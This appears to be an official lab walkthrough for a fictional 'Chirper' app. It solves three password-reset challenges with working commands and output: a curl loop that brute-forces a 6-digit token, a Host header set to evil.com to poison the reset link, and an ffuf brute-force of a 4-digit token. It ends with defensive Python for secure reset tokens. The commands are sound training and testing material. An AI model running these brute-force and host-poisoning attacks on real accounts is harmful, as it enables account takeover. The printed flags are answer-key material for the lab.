HACKR.GG
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Chirper — Password Reset

Broken Auth / Password Reset Flaws · Password Reset Vulnerabilities
Difficulty: Intermediate
Vuln class: Password Reset Vulnerabilities
Steps: 3
// Objective
Exploit three password reset weaknesses: token enumeration (Flag 1), host header poisoning (Flag 2), and predictable token brute-force (Flag 3).
// Tools required
Browser, Burp Suite, ffuf, curl
// Step-by-step walkthrough
1. Token enumeration (Flag 1)
Request a reset for admin@chirper.com. Chirper issues a 6-digit numeric token, a keyspace small enough to enumerate. Loop over every candidate, post each one, and grep the response for success.
Command / Input
for i in $(seq 100000 999999); do
  r=$(curl -s -X POST http://TARGET/reset/verify -d "token=$i&email=admin@chirper.com")
  if echo "$r" | grep -q "success"; then echo "TOKEN: $i"; break; fi
done
Output
TOKEN: 123456
{"message":"success","flag":"HackrGG{ch1rp3r_r3s3t_t0k3n_3num}"}
grep -q checks each response for "success"; the loop prints the token and stops as soon as the correct value is hit.
2. Host header poisoning (Flag 2)
Request a fresh reset for admin. Intercept the request in Burp and change the Host header to evil.com. The server builds the reset link from the Host header rather than a configured origin; in this lab a debug field in the response reveals the generated token.
Command / Input
POST /forgot
Host: evil.com

{"email":"admin@chirper.com"}
Output
{"message":"Reset link sent","debug_token":"abc123xyz","flag":"HackrGG{p4ssw0rd_r3s3t_h0st_h34d3r_p01s0n}"}
In production the emailed reset link would point at the poisoned domain, handing the token to whoever controls it. Here debug mode returns the token directly.
3. Short token brute-force (Flag 3)
Request one more reset. This token is a 4-digit number, so all 10,000 values can be tried with ffuf; -mc 200 keeps only responses with status 200.
Command / Input
ffuf -u http://TARGET/reset?token=FUZZ -w <(seq -w 0 9999) -mc 200
Output
{"flag":"HackrGG{p4ssw0rd_r3s3t_pr3d1ct4bl3_t0k3n}"}
Tokens must be cryptographically random (32+ hex chars), single-use, and expiring.
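As an added illustration of that requirement (example code, not part of the walkthrough or of Chirper), the following issues and verifies reset tokens in a way that closes all three flaws: a 256-bit random token (not a 4- or 6-digit code), stored only as a hash, bound to the requesting email, expiring, single-use, with a failure counter that revokes outstanding tokens, and a reset link built from a fixed BASE_URL rather than the Host header. BASE_URL, TOKEN_TTL_SECONDS and MAX_FAILED_VERIFIES are assumed values; the dicts stand in for database tables.

```python
import hashlib
import secrets
import time

# Constructed configuration (example values, not Chirper's real settings).
BASE_URL = "https://chirper.example"   # fixed origin: the link never derives from the Host header
TOKEN_TTL_SECONDS = 15 * 60            # tokens expire after 15 minutes
MAX_FAILED_VERIFIES = 5                # per email, before outstanding tokens are revoked

# In-memory stand-ins for database tables: sha256(token) -> record, and failure counters.
_tokens = {}
_failures = {}


def _hash(token):
    # Store only a hash so a leaked table does not hand out live reset tokens.
    return hashlib.sha256(token.encode()).hexdigest()


def issue_reset_token(email, now=None):
    """Issue a 256-bit random, single-use, expiring token and the link that carries it."""
    now = time.time() if now is None else now
    token = secrets.token_hex(32)       # 64 hex chars: infeasible to enumerate, unlike 4- or 6-digit codes
    _tokens[_hash(token)] = {"email": email, "expires": now + TOKEN_TTL_SECONDS, "used": False}
    return token, f"{BASE_URL}/reset?token={token}"


def verify_reset_token(email, token, now=None):
    """Accept a token exactly once, only before expiry and only for the email it was issued to."""
    now = time.time() if now is None else now
    record = _tokens.get(_hash(token))
    if record is None or record["used"] or now > record["expires"] or record["email"] != email:
        _failures[email] = _failures.get(email, 0) + 1
        if _failures[email] >= MAX_FAILED_VERIFIES:
            # Too many wrong guesses: revoke every outstanding token for this account.
            for rec in _tokens.values():
                if rec["email"] == email:
                    rec["used"] = True
        return False
    record["used"] = True               # single-use: replaying the same token fails
    _failures.pop(email, None)
    return True
```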
// Flag
Flag value
HackrGG{ch1rp3r_r3s3t_t0k3n_3num}
Three flags via three different reset vulnerabilities in the same application.